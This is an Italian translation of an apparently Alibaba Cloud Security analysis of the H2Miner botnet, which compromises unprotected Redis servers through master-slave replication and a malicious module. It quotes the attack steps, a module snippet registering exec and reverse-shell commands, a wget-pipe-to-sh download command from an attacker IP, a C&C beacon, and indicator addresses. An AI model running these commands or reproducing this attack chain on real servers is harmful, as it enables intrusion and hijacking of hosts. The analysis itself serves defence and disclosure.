Un giorno fa, uno dei server del mio progetto è stato attaccato da un worm simile. Alla ricerca di una risposta alla domanda “cos’era quello?” Ho trovato un ottimo articolo del team Alibaba Cloud Security. Dato che non ho trovato questo articolo su Habré, ho deciso di tradurlo appositamente per te <3
Iscrizione
Di recente, il team di sicurezza di Alibaba Cloud ha scoperto un'improvvisa epidemia di H2Miner. Questo tipo di worm dannoso utilizza la mancanza di autorizzazione o password deboli per Redis come gateway per i vostri sistemi, dopo di che sincronizza il proprio modulo dannoso con lo slave tramite la sincronizzazione master-slave e infine scarica questo modulo dannoso sulla macchina attaccata ed esegue programmi dannosi Istruzioni.
In passato, gli attacchi ai sistemi venivano sferrati principalmente utilizzando un metodo che prevedeva attività pianificate o chiavi SSH scritte sul computer dopo che l'aggressore accedeva a Redis. Fortunatamente, questo metodo non può essere utilizzato spesso a causa di problemi con il controllo dei permessi o a causa delle diverse versioni del sistema. Tuttavia, questo metodo di caricamento di un modulo dannoso può eseguire direttamente i comandi dell'aggressore o ottenere l'accesso alla shell, il che è pericoloso per il tuo sistema.
A causa dell'elevato numero di server Redis ospitati su Internet (quasi 1 milione), il team di sicurezza di Alibaba Cloud, come promemoria amichevole, raccomanda agli utenti di non condividere Redis online e di verificare regolarmente la forza delle proprie password e se sono compromesse. selezione rapida.
H2Miner
H2Miner è una botnet di mining per sistemi basati su Linux che può invadere il tuo sistema in vari modi, inclusa la mancanza di autorizzazione nelle vulnerabilità Hadoop Yarn, Docker e Redis Remote Command Execution (RCE). Una botnet funziona scaricando script dannosi e malware per estrarre i dati, espandere l'attacco orizzontalmente e mantenere le comunicazioni di comando e controllo (C&C).
Redis RCE
La conoscenza su questo argomento è stata condivisa da Pavel Toporkov a ZeroNights 2018. Dopo la versione 4.0, Redis supporta una funzionalità di caricamento del plug-in che offre agli utenti la possibilità di caricare file compilati con C in Redis per eseguire comandi Redis specifici. Questa funzione, sebbene utile, contiene una vulnerabilità in cui, in modalità master-slave, i file possono essere sincronizzati con lo slave tramite la modalità fullresync. Questo può essere utilizzato da un utente malintenzionato per trasferire file SO dannosi. Una volta completato il trasferimento, gli aggressori caricano il modulo sull'istanza Redis attaccata ed eseguono qualsiasi comando.
Analisi dei worm malware
Recentemente, il team di sicurezza di Alibaba Cloud ha scoperto che le dimensioni del gruppo di minatori dannosi H2Miner sono improvvisamente aumentate notevolmente. Secondo l’analisi, il processo generale in cui si verifica un attacco è il seguente:
H2Miner utilizza RCE Redis per un attacco a tutti gli effetti. Gli aggressori attaccano innanzitutto i server Redis non protetti o i server con password deboli.
Quindi usano il comando config set dbfilename red2.so per modificare il nome del file. Successivamente, gli aggressori eseguono il comando slaveof per impostare l'indirizzo host di replica master-slave.
Quando l'istanza Redis attaccata stabilisce una connessione master-slave con il Redis dannoso di proprietà dell'aggressore, l'aggressore invia il modulo infetto utilizzando il comando fullresync per sincronizzare i file. Il file red2.so verrà quindi scaricato sul computer attaccato. Gli aggressori utilizzano quindi il modulo di caricamento ./red2.so per caricare questo file so. Il modulo può eseguire comandi di un utente malintenzionato o avviare una connessione inversa (backdoor) per accedere alla macchina attaccata.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Dopo aver eseguito un comando dannoso come / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, l'utente malintenzionato reimposterà il nome del file di backup e scaricherà il modulo di sistema per eliminare le tracce. Tuttavia, il file red2.so rimarrà comunque sul computer attaccato. Si consiglia agli utenti di prestare attenzione alla presenza di un file sospetto nella cartella della propria istanza Redis.
Oltre a uccidere alcuni processi dannosi per rubare risorse, l'aggressore ha seguito uno script dannoso scaricando ed eseguendo file binari dannosi per . Ciò significa che il nome del processo o il nome della directory contenente kinsing sull'host potrebbe indicare che quella macchina è stata infettata da questo virus.
Secondo i risultati del reverse engineering, il malware svolge principalmente le seguenti funzioni:
- Caricamento di file ed esecuzione
- estrazione
- Mantenimento della comunicazione C&C ed esecuzione dei comandi dell'aggressore
Usa masscan per la scansione esterna per espandere la tua influenza. Inoltre, l'indirizzo IP del server C&C è codificato nel programma e l'host attaccato comunicherà con il server di comunicazione C&C utilizzando richieste HTTP, dove le informazioni sullo zombie (server compromesso) vengono identificate nell'intestazione HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Altri metodi di attacco
Indirizzi e collegamenti utilizzati dal worm
/parentela
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Consiglio
Innanzitutto, Redis non dovrebbe essere accessibile da Internet e dovrebbe essere protetto con una password complessa. È anche importante che i client controllino che non sia presente alcun file red2.so nella directory Redis e che non vi sia alcun "parenting" nel nome del file/processo sull'host.
Fonte: habr.com